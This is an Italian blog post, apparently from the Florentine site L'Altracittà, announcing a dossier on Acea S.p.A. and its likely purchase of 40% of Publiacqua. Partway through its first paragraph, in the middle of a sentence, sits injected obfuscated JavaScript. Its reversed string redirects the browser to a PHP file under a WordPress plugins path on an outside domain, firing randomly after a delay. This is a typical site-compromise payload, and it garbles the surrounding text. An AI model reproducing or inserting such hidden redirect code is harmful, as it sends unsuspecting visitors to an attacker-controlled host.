Dossier Acea S.p.a. Ecco chi darà da bere ai fiorentini nei prossimi anni

image_pdfimage_print

Grazie ad una collaboratrice romana l’Altracittà mette a disposizione un dossier su Acea spa, la società che molto probabilmente acquisterà il 40% di Publiacqua a Firenze. Nei prossimi giorni ci sarà l’ok ufficiale e sapremo così se la gara è (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andata a buon fine (per chi?) o meno. Credo sia molto utile per farsi un’idea di ciò che i cittadini fiorentini possano aspettarsi prossimamente.

All’interno del dossier, troverete:
– articoli stampa
– analisi specializzate sul bilancio e le prospettive industriali
– il parere sul Contratto di Servizio per la gestione del servizio di distribuzione di acqua potabile tra il Comune di Roma e Acea S.p.A.
– Dati contabili e statistici tecnico/amministrativi; Analisi interna per il controllo; Analisi tariffaria di gestione; Bilanci e Studi di comparto di Enti Statali, Regione, ATO, Province, Comuni, Utenza, Autorità
– Alcune considerazioni sui consumi idrici a Roma
– Bibliografia

Grazie per l’attenzione

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *